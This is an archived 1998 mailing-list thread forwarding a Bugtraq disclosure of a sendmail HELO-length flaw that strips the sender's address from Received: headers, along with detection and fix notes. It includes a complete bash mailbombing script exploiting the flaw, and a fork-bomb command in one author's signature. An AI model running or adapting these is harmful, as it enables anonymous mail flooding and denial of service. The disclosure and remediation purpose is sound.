[Raw Msg Headers][Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Crippling Received: headers

To: zmailer@nic.funet.fi
Subject: Crippling Received: headers
From: Eugene Crosser <crosser@online.ru>
Date: Wed, 27 May 1998 20:48:13 +0400 (MSD)
Reply-To: Eugene Crosser <crosser@online.ru>
Sender: crosser@ariel.sovam.com

Matti,

attached is a message from bugtrack about a way to make sendmail produce
Received: header without information about the sender host address.
I appears that Zmailer is vulnerable to the same type of attack.

Eugene

To: BUGTRAQ@NETSPACE.ORG
Subject: about sendmail 8.8.8 HELO hole
From: Valentin Pavlov <root@PNS.NETBG.COM>
Date: Fri, 22 May 1998 12:36:54 +0300
Approved-By: aleph1@NATIONWIDE.NET
Reply-To: Valentin Pavlov <root@PNS.NETBG.COM>
ReSent-Date: Wed, 27 May 1998 20:30:51 +0400 (MSD)
ReSent-From: "Andrew A. Martis" <andy@online.ru>
ReSent-Message-ID: <ML-3.3.896286651.2583.andy@erato.sovam.com>
ReSent-Reply-To: "Andrew A. Martis" <andy@online.ru>
ReSent-To: crosser@online.ru
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>

I assume this this is pretty old (10 Jan 1998) but still...

I found a pretty simple way to prevent the hiding of the sender's IP
address. The method to hide the IP address of the sender is described
bellow. Now, if we want to keep track of such exploit attempts, we have to
compile sendmail 8.8.8 with a PICKY_HELO_CHECK defined in conf.h:

#define PICKY_HELO_CHECK 1

This will force sendmail to syslog an authentication warning
(message with LOG_INFO level) and include an X-Authentication-Warning:
header in the message, saying what host tried to hide itself. Check out
the source (srvrsmpt.c, main.c). Also, LogLevel must be set to a value
higher than 3 (default is 9) in sendmail.cf.


regards,
capone

-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Make source, not [high]score
----------------------------
Valentin 'Val Capone' Pavlov
----------------------------
capone@netbg.com,  UKTC87203
-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Now for the original message, describing the exploit:

-----Original Message-----
From: Michał Zalewski <lcamtuf@boss.staszic.waw.pl>
To: info@rootshell.com <info@rootshell.com>
Date: 10 stycznia 1998 12:28
Subject: Sendmail 8.8.8 (qmail?) HELO hole.


Here's a brief description of Sendmail (qmail) hole I found
recently:

When someone mailbombs you, or tries to send fakemail, spam, etc -
sendmail normally attachs sender's host name and it's address
to outgoing message:

--
>From spam@flooders.net Mon Jan  5 22:08:21 1998
Received: from spammer (marc@math.university.edu [150.129.84.5])
          by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376
          for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100
Date: Mon, 5 Jan 1998 22:07:54 +0100
From: spam@flooders.net
Message-Id: <3.14159665@pi>

MAILBOOM!!!
--

That's perfect - now you know, who is responsible for that annoying
junk in your mailbox: "Received: from spammer (marc@math.university.edu
[150.129.84.5])". Nothing easier...
But I found a small hole, which allows user to hide it's personality,
and send mails anonymously. The only thing you should do is to
pass HELO string longer than approx. 1024 B - sender's location and
other very useful information will be cropped!!! Message
headers should become not interesting. Sometimes, sender
may become quite untraceable (but not always, if it's possible
to obtain logs from machine which has been used to sent):

--
>From spam@flooders.net Mon Jan  5 22:09:05 1998
Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx
Date: Mon, 5 Jan 1998 22:08:52 +0100
From: spam@flooders.net
Message-Id: <3.14159665@pi>

MAILBOOM!!! Now guess who am I...
--


Here's a simple example of Sendmail's HELO hole usage. Note, this
script has been written ONLY to show how easy may be sending
fakemails, mailbombs, with cooperation of Sendmail ;) Script is
very slow and restricted in many ways, but explains the problem
well (note, some of non-Berkeley daemons are also affected,
probably Qmail?):

-- EXPLOIT CODE --
#!/bin/bash
TMPDIR=/tmp/`whoami`
PLIK=$TMPDIR/.safe
TIMEOUT=2
LIMIT=10
MAX=20

echo
echo "SafeBomb 1.02b -- sendmail HELO hole usage example"
echo "Author: Michal Zalewski <lcamtuf@boss.staszic.waw.pl>"
echo

if [ "$4" = "" ]; then
  echo "USAGE: $0 msgfile address server sender"
  echo
  echo "  msgfile - file to send as a message body"
  echo "  address - address of lucky recipient"
  echo "  server  - outgoing smtp server w/sendmail"
  echo "  sender  - introduce yourself"
  echo
  echo "WARNING: For educational use ONLY. Mailbombing is illegal."
  echo "Think twice BEFORE you use this program in any way. Also,"
  echo "I've never said this program is 100% safe nor bug-free."
  echo
  sleep 1
  exit 0
fi

if [ ! -f $1 ]; then
  echo "Message file not found."
  echo
  exit 0
fi

echo -n "Preparing message..."
mkdir $TMPDIR &>/dev/null
chmod 700 $TMPDIR
echo "echo \"helo _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa
febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe
bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo
mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom
b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_
_safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_\"" >$PLIK
echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK
echo "echo \"rcpt to: $2\"" >>$PLIK
echo "echo \"data\"" >>$PLIK
echo "cat <<__qniec__" >>$PLIK
cat $1 >>$PLIK
echo "__qniec__" >>$PLIK
echo "echo \".\"" >>$PLIK
echo "echo \"quit\"" >>$PLIK
echo "sleep $TIMEOUT" >>$PLIK
chmod +x $PLIK
echo "OK"

echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."
SENT=0

while [ -f $1 ]; do
  $PLIK|telnet $3 25 &>/dev/null &
  let SENT=SENT+1
  echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"
  CONNECTED=`ps|grep -c "telnet $3"`
  if [ "$LIMIT" -le "$CONNECTED" ]; then
    while [ "$LIMIT" -le "$CONNECTED" ]; do
      sleep 1
    done
  fi
  if [ "$SENT" -ge "$MAX" ]; then
    echo "It's just an example, sorry."
    echo
    exit 0
  fi
done
-- EOF --

Suggested fix: insert additional length limit into HELO/EHLO
parameter scanning routine OR disable AllowBogusHELO (but it
may cause serious troubles). I have no 8.8.8 sources at the
time, so execuse me if it's unclear.

PS:

--
From: Gregory Neil Shapiro <sendmail+gshapiro@sendmail.org>

I was able to reproduce the header problem by lengthening the HELO string
in your script.

[...]

This will be fixed in sendmail 8.9.
--

_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
Iterować jest rzeczą ludzką, wykonywać rekursywnie - boską [P. Deustch]
=--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=

Follow-Ups:
- Re: Crippling Received: headers
  - From: mea@nic.funet.fi (Wed, 27 May 1998 20:55:40 +0300)

Prev by Date: router does memory fault (.50s4)
Next by Date: Re: Crippling Received: headers
Prev by thread: Re: router does memory fault (.50s4)
Next by thread: Re: Crippling Received: headers
Index(es):
- Date
- Thread